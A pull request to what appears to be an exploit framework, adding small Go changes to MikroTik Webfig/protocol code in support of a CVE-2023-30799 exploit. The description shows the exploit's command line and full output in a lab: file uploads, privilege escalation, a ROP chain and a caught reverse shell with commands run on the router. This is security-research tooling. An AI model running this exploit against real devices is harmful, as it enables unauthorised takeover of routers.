### PR TITLE
Tweaks to Support CVE-2023-30799

### DIFF
--- a/protocol/mikrotik/msg.go
+++ b/protocol/mikrotik/msg.go
@@ -40,41 +40,41 @@ const (
 )
 
 const (
-	varSysTo         uint32 = 0x00ff0001
-	varFrom          uint32 = 0x00ff0002
-	varReplyExpected uint32 = 0x00ff0005
-	varRequestID     uint32 = 0x00ff0006
-	varCommand       uint32 = 0x00ff0007
-	varErrorCode     uint32 = 0x00ff0008
-	varErrorString   uint32 = 0x00ff0009
-	varSessionID     uint32 = 0x00fe0001
+	VarSysTo         uint32 = 0x00ff0001
+	VarFrom          uint32 = 0x00ff0002
+	VarReplyExpected uint32 = 0x00ff0005
+	VarRequestID     uint32 = 0x00ff0006
+	VarCommand       uint32 = 0x00ff0007
+	VarErrorCode     uint32 = 0x00ff0008
+	VarErrorString   uint32 = 0x00ff0009
+	VarSessionID     uint32 = 0x00fe0001
 )
 
 func (msg M2Message) SetTo(to uint32, handler uint32) {
 	uint32Slice := make([]uint32, 2)
 	uint32Slice[0] = to
 	uint32Slice[1] = handler
-	msg.AddU32Array(varSysTo, uint32Slice)
+	msg.AddU32Array(VarSysTo, uint32Slice)
 }
 
 func (msg M2Message) SetCommand(command uint32) {
-	msg.AddU32(varCommand, command)
+	msg.AddU32(VarCommand, command)
 }
 
 func (msg M2Message) SetRequestID(id uint32) {
-	msg.AddU32(varRequestID, id)
+	msg.AddU32(VarRequestID, id)
 }
 
 func (msg M2Message) SetReplyExpected(expected bool) {
-	msg.AddBool(varReplyExpected, expected)
+	msg.AddBool(VarReplyExpected, expected)
 }
 
 func (msg M2Message) SetSessionID(id uint32) {
-	msg.AddU32(varSessionID, id)
+	msg.AddU32(VarSessionID, id)
 }
 
 func (msg M2Message) GetSessionID() uint32 {
-	return msg.U32s[varSessionID]
+	return msg.U32s[VarSessionID]
 }
 
 func (msg M2Message) AddBool(varname uint32, data bool) {
@@ -88,6 +88,11 @@ func (msg M2Message) AddU32(varname uint32, data uint32) {
 func (msg M2Message) AddString(varname uint32, data []byte) {
 	msg.Strings[varname] = make([]byte, len(data))
 	copy(msg.Strings[varname], data)
+}
+
+func (msg M2Message) AddRaw(varname uint32, data []byte) {
+	msg.Raw[varname] = make([]byte, len(data))
+	copy(msg.Raw[varname], data)
 }
 
 func (msg M2Message) AddU32Array(varname uint32, data []uint32) {

--- a/protocol/mikrotik/webfig.go
+++ b/protocol/mikrotik/webfig.go
@@ -258,7 +258,7 @@ func Login(webfigURL string, username string, password string, session *WebfigSe
 }
 
 // Upload a file via webfig. The expected url is: http[s]://<address>:<port>/jsproxy
-// The file will be written to /rw/disk and be viewable from the Webfig disk menu
+// The file will be written to /rw/disk and be viewable from the Webfig disk menu.
 func FileUpload(webfigURL string, filename string, contents string, session *WebfigSession) bool {
 	orginalName := filename
 


### PR DESCRIPTION
A couple of final tweaks to support CVE-2023-30799

```
./build/cve-2023-30799_linux-arm64 -v -c -e -rhost 10.12.70.1 -lhost 10.12.70.252 -lport 1270 -user admin -password labpass1
[*] Starting listener on 10.12.70.252:1270
[*] Starting target 0: 10.12.70.1:80
[*] Validating the remote target is a MikroTik installation
[+] Target validation succeeded!
[*] Running a version check on the remote target
[*] The self-reported release is: 6.48.7
[+] The target appears to be a vulnerable version!
[*] Authenticated to a RB952Ui-5ac2nD
[*] Uploading shared object
[*] Uploading busybox
[*] Adding privileges
[*] Sending ROP chain
[*] Using gadgets for version 6.48.7
[+] Caught new shell from 10.12.70.1:48679
[+] Active shell from 10.12.70.1:48679
$ /rw/disk/busybox cat /flash/rw/logs/VERSION
ash: can't access tty; job control turned off
/ # v6.48.7 May/23/2023 05:27:08
$ /rw/disk/busybox cat /proc/cpuinfo
system type		: unknown routerboard
processor		: 0
cpu model		: MIPS 24Kc V7.4
cpu MHz			: 650.000
BogoMIPS		: 432.53
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 16
extra interrupt vector	: no
hardware watchpoint	: yes, count: 4, address/irw mask: [0x0000, 0x0200, 0x06d8, 0x0b50]
ASEs implemented	: mips16
shadow register sets	: 1
kscratch registers	: 0
core			: 0
VCED exceptions		: not available
VCEI exceptions		: not available

$ 
```